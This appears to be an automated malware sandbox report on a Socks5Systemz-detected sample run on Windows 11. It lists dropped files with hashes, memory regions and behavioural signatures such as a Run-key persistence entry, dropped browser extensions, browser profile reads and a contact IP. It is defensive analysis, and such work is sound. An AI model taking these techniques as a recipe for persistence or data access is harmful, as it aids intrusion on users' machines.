| SHA1 | a229e4e88fad6fa382cd53f758af7579e6e10831 |
| SHA256 | 77d96b1c561454c31c8f0522934b5977cba696ab612475054039095aaa7f5513 |
| SHA512 | cf55bab8d8b41e0024c43416ff92feff30a4711916afa1a07739591c863668ed796a4670cba694b48954d7c1922420852819f970e8dca3f0e811a7b59cd94fdf |
C:\Users\Admin\AppData\Local\Temp\y7ZsR72z\lNdzzyFPAwOlp5XgSLE.exe
| MD5 | bfcf6a8099e1c16e23720637b74e2621 |
| SHA1 | 928302f4795c14c1c481475122cabd36af1db2d4 |
| SHA256 | ddee82b36825dab91ef266287694fcce8aeb12ed3bb7b1858e1cd016610a8e40 |
| SHA512 | 565f3f7c9787264a231f3e7bf7f20ea05d82c422120050f3c168ce31b5f52d7e2f1b01011c30e593bc123602fb6317499e26ef01dbaa03ef7536f14b46f3a951 |
memory/3660-484-0x00000000063E0000-0x000000000642C000-memory.dmp
memory/764-481-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsf4C9D.tmp\nsProcess.dll
| MD5 | faa7f034b38e729a983965c04cc70fc1 |
| SHA1 | df8bda55b498976ea47d25d8a77539b049dab55e |
| SHA256 | 579a034ff5ab9b732a318b1636c2902840f604e8e664f5b93c07a99253b3c9cf |
| SHA512 | 7868f9b437fcf829ad993ff57995f58836ad578458994361c72ae1bf1dfb74022f9f9e948b48afd3361ed3426c4f85b4bb0d595e38ee278fee5c4425c4491dbf |
C:\Users\Admin\AppData\Local\Temp\is-G7OL2.tmp\lNdzzyFPAwOlp5XgSLE.tmp
| MD5 | 0772dab3b71a115119373645908f8728 |
| SHA1 | 27a20f3809153980ef7a2b3f599c2683edc214aa |
| SHA256 | 62415d7ed167e7cf2e5cc0048dc5895e3e185a9cd670ae388c573dd777c034f6 |
| SHA512 | 478bcfa6a94a4c24c4f76610dd571cfbf343d7b610b68b69f46b6a8f6a5b162ab6414bdb6ffa9b97d7f979e53cf1ab31438ac45c2a1184f6faf92aba5569fd81 |
C:\Users\Admin\AppData\Local\Temp\nsf4C9D.tmp\INetC.dll
| MD5 | 92ec4dd8c0ddd8c4305ae1684ab65fb0 |
| SHA1 | d850013d582a62e502942f0dd282cc0c29c4310e |
| SHA256 | 5520208a33e6409c129b4ea1270771f741d95afe5b048c2a1e6a2cc2ad829934 |
| SHA512 | 581351aef694f2489e1a0977ebca55c4d7268ca167127cefb217ed0d2098136c7eb433058469449f75be82b8e5d484c9e7b6cf0b32535063709272d7810ec651 |
C:\Users\Admin\AppData\Local\Temp\nsf4C9D.tmp\blowfish.dll
| MD5 | 5afd4a9b7e69e7c6e312b2ce4040394a |
| SHA1 | fbd07adb3f02f866dc3a327a86b0f319d4a94502 |
| SHA256 | 053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae |
| SHA512 | f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511 |
C:\Users\Admin\AppData\Local\Temp\is-U6T0L.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1e6c71450e6599ac1e84fcd6b48f5fe8 |
| SHA1 | 37e3bfbb762dd24f6bb530b549f8745d0a357b65 |
| SHA256 | 6a6fa584a1418eaa9098196470b94e471eec0eff868a179d96c984ec722b0cf4 |
| SHA512 | 833c4ac751845d76987746e4a39b22747dec10589844569d87962bd4662fa3e757f95a33a022e400a15e043d3fe63f2787a50d0e38f0b40c05ec13b79996bde4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 549f3fdbe7d5052f6e28903238de044c |
| SHA1 | c84aa4a9c6ff87bea73f728186a58ec6ed705089 |
| SHA256 | e1a484cc22511585ca0f1895052e78ccc7187129594c155a66d6f8a2b545d33e |
| SHA512 | bbce862b56c3675176371ff49a74b25acbafdfac665fd1d3e7279ab0f2f702efdb3d09912ea8ac53146d8d6fa31f85e3cba630fc439dc1a4f03be97fa98b9e87 |
C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe
| MD5 | 237ecd4700cbe4067a075be7ea017d93 |
| SHA1 | f1d44a1597ace09859d74c027cdef665d7209e68 |
| SHA256 | f4e0993a49b614bfb2cdace65421e2c2f7ff1be8e561a6ee4d39be9102402563 |
| SHA512 | 6ecd087279b65d892d978b10daa56ad97a090a403189dda15183a155ce89d89bee6a68f9e92ab88444a152371bed2135ba729e712ea9e5947be3c4d2d26c8423 |
memory/1092-590-0x0000000000400000-0x0000000000898000-memory.dmp
memory/1112-596-0x0000000000400000-0x0000000000D01000-memory.dmp
memory/1092-592-0x0000000000400000-0x0000000000898000-memory.dmp
memory/4784-597-0x0000000000400000-0x0000000000898000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 164a1a34c839748d3f7cacdc4bbdf821 |
| SHA1 | 1877800db1756b7c86d6f4cc6dff79ff7ae269f3 |
| SHA256 | 7d8657d62d42a5c92ed836a88694cc9b31fee7b89d86af61fc39c8eb97683891 |
| SHA512 | 2ab4d2326b725fb2210b48879324b3a7b171b45a12599b45fc8b6f702d6da039f74bc28ef0d952a21f6a901407298aa38366b65e13773f48d440188531823b3b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | fb8d675d876a509ed5157018266bd7cc |
| SHA1 | a8e9bff43e7e516f0472b472ee2d0fcccf7f38dd |
| SHA256 | ab513b2bf65e4dd9c81737cfe851760089f7518e1ff35ed34dcb6aae05930fed |
| SHA512 | 2446656b7e542b437b9d25299a4a48549befb0877aa6de666e3c67cf92acfe4f62f3e6891437034dc47b47217e1674034a92e5ba2340a8749cfc594ce198d958 |
C:\Users\Admin\AppData\Local\Temp\PDNFXBP9\lOyDlKbc.exe
| MD5 | 58f69c99b3735378dc85c5b9e88b4da2 |
| SHA1 | 627a6e991178d9cf47495eb348edb60478a5f2c1 |
| SHA256 | 4f4f6f526b1881278993ee7f8d32ecfef45937a7cf65f4da458be0a4682223e8 |
| SHA512 | 1e518a145f2d25afe61e1994e0d36c793f24dca4390629db202398a9610e6ae40080ec5ed7b22eae9a08e2b8c5d97dc825f4e1dbe14f27eadfedbd3d99bf3f4c |
C:\Users\Admin\AppData\Local\Temp\7zS4629C85A\setup.exe
| MD5 | 9f1b088ecc5e2f36939797060e8f5956 |
| SHA1 | 78adf95b81e539d1450c61a8d135f5f836bcd4a9 |
| SHA256 | 1caa0f7f2913218f5bcd069a52aad482396914780d89f77c6610b70b36dc1e13 |
| SHA512 | 6bd73db75e7c7493ac6e03e745385641c4eccaeb1d8e96a2b157e1d4043d42990a05edd6702f28e25d4a25d4e39295739f1a6a6ccf89e629f6010ee8ebd66212 |
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2407160514213202932.dll
| MD5 | 82234053e684a16ea0b40a7f208f3233 |
| SHA1 | 00381b28887a12f9ef8ee51cdbcc4320679ae88b |
| SHA256 | 23bda6025409f7e0a044b10644f4bace9772426312a969552931291306917c23 |
| SHA512 | be3235cc7d6ed941ced36cdc43a87ffae3b5163cacc12c2cbe6f320b6469d1c16d0bf2e42558df504d2c1a12d0234cfd187438830a59554696864a234de5f357 |
C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat
| MD5 | 6946b7865cfeb361f44d97dfa2fff7e8 |
| SHA1 | f1d73fb78b1b73c6addaef0f1b74462c8232e799 |
| SHA256 | 5f183e4d6f4fee3180826dead2293bc46d93d6bb40d9bf9591d097b46e85ed52 |
| SHA512 | ffb513ecf777563a6735aa564b02d95358900ea72b3109ecd2fe4ec6b6785d18370ef89fe84de75c5c06194fc617abe65a6c03d3a1728739e0d03b5ec1c3d349 |
memory/5128-675-0x0000000006560000-0x00000000065AC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\48DD1CqE\LsO2143M1d0.exe
| MD5 | 4804a8f65e129f3c12e932520e841984 |
| SHA1 | e1e81f264960a5f6037293a5a8edee414621619e |
| SHA256 | 5b43642bad3a3ac02ad962bc8218538af3c062baab6f635cdb69f45c2adf34ad |
| SHA512 | 2bd49cf1aaac6389ab78cc7fcb2b428601e75b953124c68d368fe51459bd1ae0670391fff5a58736b492d6fdbe9a6877278c2160780e7521a9caa803fc75de6a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 51565b522aee0240085d6e76ed4366d8 |
| SHA1 | 04d06e2df560f22383d3f8b5f3d5aa3acebe00f8 |
| SHA256 | a03fd30a290630f70b9a1376bb60617421b533793d23bac73ea730e7a0306b6c |
| SHA512 | 37a734746c86b6bd59c5ebb45dfd61b984368ff8a3c0edeb87117f4aad42b536fec06268404ff8528e4bb8c6105b2e369913403b5c8fd4c113e0b4e3146a1c90 |
memory/5416-689-0x0000000010000000-0x00000000105E5000-memory.dmp
memory/6024-700-0x0000000005D70000-0x00000000060C4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2cce6bef10d9351280c4aa6a2d1c2466 |
| SHA1 | cdcec37c9b78bd729ed57548254c0fe0e9f29e85 |
| SHA256 | 90ca415fa59473150cb67164ad1ad5aba22d97aca90f71bd587a2bda246859ae |
| SHA512 | d9cf471d94608b67a6d0591a659a41360c27399741bb528e34dde4b0d19f93bc0d4911856f5ebe31055e7339abe2be43f80b74f6140b6b3aa03b0739dd1a12cc |
memory/6024-721-0x0000000006620000-0x000000000666C000-memory.dmp
memory/1112-730-0x0000000000400000-0x0000000000D01000-memory.dmp
memory/4784-733-0x0000000000400000-0x0000000000898000-memory.dmp
memory/760-732-0x0000000000400000-0x00000000004BA000-memory.dmp
memory/764-731-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160514221\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe
| MD5 | dfe86cd1ab9fe5055dba3ead830574f6 |
| SHA1 | 800ba6757bf301a918a800ce15a3853e3941e019 |
| SHA256 | f9cdff6fea65207cde93c637cca4b92939359ede3ac7337c2048e076085e7e5f |
| SHA512 | d3d363a221a3fa7a010194965cb8cc7210aa17d81be094a3e8ee89bb2de684c3b874ce1c6c55e8109091a849874d05c1bae132d450dabe2597167782d0063570 |
memory/1112-766-0x0000000000400000-0x0000000000D01000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | fc545c0a3eef95f1f27d1f62de51f3ed |
| SHA1 | 50abfd4e22d40b5dc014f5ce8573c49a6662ab49 |
| SHA256 | 1d6187210ba0514263b0f811dbc9df02617e4ac9f24e1b75f9e6caadc2e21427 |
| SHA512 | 18c871090f89988ebc55eee38d442623b5266d1094f11aa7f488eba8ab1009f4bff15897cd92e3b6bf8ba33e21e9061bd1e70ca34a673cfe8ba3b6b4af1ab6ab |
memory/4784-787-0x0000000000400000-0x0000000000898000-memory.dmp
memory/1112-790-0x0000000000400000-0x0000000000D01000-memory.dmp
memory/4784-793-0x0000000000400000-0x0000000000898000-memory.dmp
memory/4784-797-0x0000000000400000-0x0000000000898000-memory.dmp
memory/1112-796-0x0000000000400000-0x0000000000D01000-memory.dmp
memory/4784-800-0x0000000000400000-0x0000000000898000-memory.dmp
memory/5936-801-0x0000000010000000-0x00000000105E5000-memory.dmp
memory/5708-810-0x0000000004F50000-0x00000000052A4000-memory.dmp
memory/5708-815-0x00000000055F0000-0x000000000563C000-memory.dmp
memory/5436-841-0x0000024C4A1F0000-0x0000024C4A212000-memory.dmp
memory/1112-844-0x0000000000400000-0x0000000000D01000-memory.dmp
memory/760-846-0x0000000000400000-0x00000000004BA000-memory.dmp
memory/4784-847-0x0000000000400000-0x0000000000898000-memory.dmp
memory/1408-849-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/1112-850-0x0000000000400000-0x0000000000D01000-memory.dmp
memory/4784-853-0x0000000000400000-0x0000000000898000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 9c3bf82a5982685b38537fa8587c1817 |
| SHA1 | 8d2636701c8ee07573f0b36c169e647367f933d0 |
| SHA256 | aa12e7ff0e61a37ae45dbb35c0a0580a3b5ffb36524122e375b2fec08070177f |
| SHA512 | c11ebbc276adcd51ac8c2a000993f40bacfde559379bddb19f9187ce231e585919034b44d5ed44f5d2a979fbfcffe93eca6de6c0c85c3d71caabcf1f9998fddd |
memory/4784-865-0x0000000000AE0000-0x0000000000B82000-memory.dmp
memory/5632-867-0x0000000010000000-0x00000000105E5000-memory.dmp
memory/3424-882-0x0000000004620000-0x0000000004974000-memory.dmp
memory/3424-885-0x0000000004C50000-0x0000000004C9C000-memory.dmp
memory/5632-892-0x0000000002F80000-0x0000000003005000-memory.dmp
C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi
| MD5 | 9f22cae849c155b565bc75cb932b5691 |
| SHA1 | 79bcf8f2a04331f5fae27fcde922e23edfe4c3fa |
| SHA256 | 127b83ec5a3ec4d594406860f0cccc9993044e473cafab50cc346137d58f9825 |
| SHA512 | 9b24094659fa562c74bef763f59dbef6ceb2f97ce2eee0c1922234f8cb28f4f9951c387731faffca9e5edf7e7165daa395919c54b7083323540512545b27c53c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\en\messages.json
| MD5 | 33292c7c04ba45e9630bb3d6c5cabf74 |
| SHA1 | 3482eb8038f429ad76340d3b0d6eea6db74e31bd |
| SHA256 | 9bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249 |
| SHA512 | 2439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\pt_BR\messages.json
| MD5 | 5c5a1426ff0c1128c1c6b8bc20ca29ac |
| SHA1 | 0e3540b647b488225c9967ff97afc66319102ccd |
| SHA256 | 5e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839 |
| SHA512 | 1f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\bnaebcjlolajbgllgjlmlfobobdemmki\3.8.26_0\_locales\es\messages.json
| MD5 | a14d4b287e82b0c724252d7060b6d9e9 |
| SHA1 | da9d3da2df385d48f607445803f5817f635cc52d |
| SHA256 | 1e16982fac30651f8214b23b6d81d451cc7dbb322eb1242ae40b0b9558345152 |
| SHA512 | 1c4d1d3d658d9619a52b75bad062a07f625078d9075af706aa0051c5f164540c0aa4dacfb1345112ac7fc6e4d560cc1ea2023735bcf68b81bf674bc2fb8123fb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 276f14e13b8a2074033c0b698d3e044b |
| SHA1 | 0116d8e139f843e73e1a8118fd6052e18d08f74a |
| SHA256 | 69e731cffa0d021c07b861c263b8b6c0624cb6e847c3519d3305fb44580fb2b6 |
| SHA512 | 6eb6b80d45e4ffc72ba2cc8ebf57cd0d0f6d22fb9e05dab5bde4bf89569e503c6afffb8d9063b1bd539cce5acc8873e351323f438c018e5bbf156159a12c386c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vvc8bff9.default-release\prefs.js
| MD5 | edca458d7006a913937f7373c858d135 |
| SHA1 | 5d5546322f2b24528bcc442584919439aa327f4f |
| SHA256 | 6da1aa980ca3f9b92f36f8cdd10728d5739ea01eda58ef4cc62ae858e8da5ba8 |
| SHA512 | 184efeeb35e62b1ebabfe21526593c1e9ab0611b11b482a42e7219c167c4e0380b4c5791cbbe61c2bb273ba3b07acba424308ee6eb0dee581dda98ebc1b40f40 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 147d966174d16a86087ac934d4461fff |
| SHA1 | 46be398e26fd1edf6f838b14da6f836d7a21a15d |
| SHA256 | edba8a24093b834cd597f2ad0755fb926c89e51fa0517bb147d2733f6989500a |
| SHA512 | 891c1a1f435470cc7c83b5784b357aa147b9ba1064d728414dff1eea777efc7cf5b1c5a1704a28d50ec6d40f6a0069dcf68133b24508908f2aa077f8f648d3b8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8e9b5b39333a537db8f528f016afbf9d |
| SHA1 | b2d064d7430acc6d373d68c50ff5b645fda2e8dc |
| SHA256 | e63b8340ff2e95ba715d9dab9c55e86819a881629da295ea8fd68c2d2c859d67 |
| SHA512 | 08994d9ebf47c8d0bdf23bf8114c554220399ead10126ed2030a4e616f4165e57197052a39939ff9a4ebcad29a80c5bd82815a767c3af86738c80b6a072a29db |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | de81e37532d2269b639a04d86f1f6ff8 |
| SHA1 | bdceca3ca8ba36ce8e74ff8766b02c24cc1c85fd |
| SHA256 | 6853dcf5b8a53a4da13b20ec768da0d467703b6434e91210e6f79cd917688acd |
| SHA512 | 7709ecb033713434ba9c26ce2af6f8985e8bea2b7c7abb0f7d81c7d0310ff0aababe64f91d447f2cd10f6406a3127a814c817cfbaafd6441dacea7f93496e5bd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0859418842b4a0bfcf9289a5b1daffb2 |
| SHA1 | a1dc9771f7b4c1046370c23254fe64d18453eeee |
| SHA256 | ab05a62aefac65b51cd6851eee1ab35b750483fd020f76f6f5aa30ef6b1846d7 |
| SHA512 | 9ea1307dff3cfdf4b4cb55ace42736b9266fc927ef35657b77d7b4cc8d105441baf65ea0b1301143343e5c34ae8ac61e1bab9f89ebb292823242a6dc9ff61b8a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | aefd77f47fb84fae5ea194496b44c67a |
| SHA1 | dcfbb6a5b8d05662c4858664f81693bb7f803b82 |
| SHA256 | 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611 |
| SHA512 | b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000017
| MD5 | 24b5dcf7cb6c9025f824aaa2a5ac8aaf |
| SHA1 | 5058277826ffea6698dc9e5cb00012814363399e |
| SHA256 | 560974cfdb75cb45b420f8052141deb23e754febe11d0b36f7e22483b0da6de2 |
| SHA512 | a51dd9d430f540fed375add9cb7f3455b3698f58c7f3c9944d6b766f52e45ac1fc7ff2bbbd01d602a3ffe72f21c5b1489edb36160d0aa3b5ce9bd90194eb1f64 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b8377734fcb7028e90222a15ef0886fa |
| SHA1 | 8d4a21034bdc629e3eb6ab9050eb79a741862f1f |
| SHA256 | 7342b967d5da615fba37b9ea45814d12c87b29c1e3b63b1723f806c782b18cd5 |
| SHA512 | 8fadb6171650e186820b69cf6abd54f7487ed3f8655044f75ef7d12a3303aec4ab0c4a0875f2cb4f84c837185578084a74bf72f4b9a2a1d1c717371bb0c87238 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 323f2f227c0f06e14bb3a3c407667726 |
| SHA1 | df05475ef52be96afa83b525b7333a8f6dc3834c |
| SHA256 | fcf92f496571821a0493a96ea4c4cafbd2a82e2f40bc82b0231216960fbf47f8 |
| SHA512 | 0c0d44bec2e79837c661d69e6eba8209dce2f68392023fc20737eab96771d83cb8080abceeaca2aeda5c90d576174aa502dcb6bdd80bd3be5b331ce0546dbad3 |
C:\Users\Admin\AppData\Local\Temp\nsoAE7E.tmp\liteFirewall.dll
| MD5 | 165e1ef5c79475e8c33d19a870e672d4 |
| SHA1 | 965f02bfd103f094ac6b3eef3abe7fdcb8d9e2a5 |
| SHA256 | 9db9c58e44dff2d985dc078fdbb7498dcc66c4cc4eb12f68de6a98a5d665abbd |
| SHA512 | cd10eaf0928e5df048bf0488d9dbfe9442e2e106396a0967462bef440bf0b528cdf3ab06024fb6fdaf9f247e2b7f3ca0cea78afc0ce6943650ef9d6c91fee52a |
memory/2052-1561-0x0000000000970000-0x00000000009CE000-memory.dmp
memory/2052-1562-0x00000000052C0000-0x0000000005352000-memory.dmp
memory/2052-1563-0x0000000005910000-0x0000000005EB4000-memory.dmp
memory/2052-1564-0x0000000005270000-0x00000000052BA000-memory.dmp
memory/2052-1565-0x0000000005790000-0x000000000586C000-memory.dmp
memory/2052-1569-0x0000000006060000-0x00000000060FC000-memory.dmp
memory/2052-1570-0x0000000006490000-0x0000000006520000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | eb65b912f3fc4c349e774f8e3fdd522d |
| SHA1 | 112a02e2bfc1fbd79f389e47c2e5ca09b05decaf |
| SHA256 | fbba763f0af76aeab463be7082373c0c0fbf45ff37e6611d832470c35c85ee75 |
| SHA512 | 1397770e22297dab8ae490438f0b271c58bfdcf85d503492eab3234e4cba71da2f6955478f0d5ea70c3d7148e68dbb59a32890535953db60a22cb51be8a2cde5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 17f16edc40b86e384467025da4382178 |
| SHA1 | 107ed9944c5b68b82e04bf24e3295e647346a297 |
| SHA256 | a0ba7ae1cef1e4dd6918dfd18f86543bf73c254e9c56638b3fa2d203ad5e4794 |
| SHA512 | e87993e83c6be2fa30d87499069ad87f041a9fbd4b45639802a39a8b522b26099f170b63442c04f592b59a2da9323155cec8f994c9e46bab147e9b2ebcbe9468 |
C:\Users\Admin\AppData\Roaming\Snetchball\images\0.jpg
| MD5 | 3ec56549ddd7268d0124b1e3fac8fc12 |
| SHA1 | 5aa23d6680a76513eaae3b2cc22b4598d7e3c21b |
| SHA256 | 69462da9b9e7fc582bbdf5e081e9b3cb2be80c2f61b04181658b39b410ff1dc5 |
| SHA512 | 658e1141d72eef354cbb1842327424c652b0f5cbcbd530fbfa6a49f15e124c1706dad838ff8ca2aa3445c81df104d2bfba2314a2a726f07029d3ef08b87aec70 |
memory/3776-1634-0x0000000008E90000-0x0000000008F08000-memory.dmp
memory/3776-1635-0x00000000096D0000-0x0000000009BFC000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 76cfbb45f897c8deda9a9e6c0ae2707c |
| SHA1 | 33f25d81d8a56f4e3cff114e6f56b788ae74a17f |
| SHA256 | 3cabcba4e8401a507cb556d892295af2871055e1e636bc4b5d500216fc3ce13f |
| SHA512 | 415835b6f7af2acff5e9c5be6715039ac29b16bb4bbb629a78427e8ce6ef6632685e55af77323aeab9ba9fdad19cd5ad7d37d8bde3e4d4e2ff0fad720cadb40e |
C:\Users\Admin\AppData\Local\CEF\User Data\LocalPrefs.json
| MD5 | 2cde8ea0865b505fa41aaa9321954d50 |
| SHA1 | 14f22cf02965a8570e80c7a0b5a8b69e20021e88 |
| SHA256 | 950c2a0593c6c1b96158d6cd2d48a9970d9b397c502ce1bc0ae60bbed1d30392 |
| SHA512 | 3b956c28db13c069e275bb5797861ca4d62ab24eca728b5ad31b814ffa3c44af3019e62c7aa9adfe99c31f657513e8d5a28f507830b15a8e4368eecc0d5aafa8 |
C:\Users\Admin\AppData\Local\CEF\User Data\LocalPrefs.json~RFe5ccb47.TMP
| MD5 | 45f22d0fb0b8944c4525c63c36ebfe57 |
| SHA1 | 919df53f5c489b7a3c9eb5a1c94ab1b0185a759f |
| SHA256 | b5fbacc6dfb01452b3fd42e75ac01c3845e5fa2b26392e8b3ed71edaaf60ff17 |
| SHA512 | bf5cbb5e6e14b58f8544f93517d221595254afeae6c2ee296aef97ecdbd00542ac5dce162d4e5979a0bbb2df5d5e2719b7ae705eb638fe268480a8375ce73898 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 3338e1a989d8ffbeb88a1d751fda9d6d |
| SHA1 | c27fc8f19dbd72d89dfa9abb9ad0c3e038fc4919 |
| SHA256 | 8b4e4530267dfac3cf9cf04279259d2b1ff53e50ddde529132ce96b0b85c9e70 |
| SHA512 | 4b5e41fd8db0dc9f4baa9018da712a5d3b6d2217c8f6298bfc146fca244088e7c770b15c07df3ba3aa885aa88886712fe90a9a0ade73e9c40fd42559fbcd6770 |
C:\Users\Admin\AppData\Roaming\Snetchball\images\0.jpg
| MD5 | b28759df87fdd8e0aa41ca4ad0509d3e |
| SHA1 | c0bf243ea138232c08a10a32dedfa803f4e49dab |
| SHA256 | 212e54c79460aa39145d7aab4627f7b46cc4461fb14215bbf62ce790cdd03f6c |
| SHA512 | 4505efb5fd324b1f450a865dcfd7be230401f6f21ccbecbd9cace51bb4c46e19aaec04fc3e79047f1cb377e29d31c7caecf77d14d433baf86140d1fe13a896c6 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-16 05:11
Reported
2024-07-16 05:18
Platform
win11-20240709-en
Max time kernel
450s
Max time network
455s
Command Line
Signatures
Detect Socks5Systemz Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Socks5Systemz
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\LPL9xJBa\HrDttahkOdAABIRdJv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 45.155.250.90 | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Run\Snetchball = "C:\\Users\\Admin\\AppData\\Roaming\\Snetchball\\Snetchball.exe" | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Checks installed software on the system
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Users\Admin\AppData\Local\Temp\7zS05233879\setup.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\7zS05233879\setup.exe | N/A |
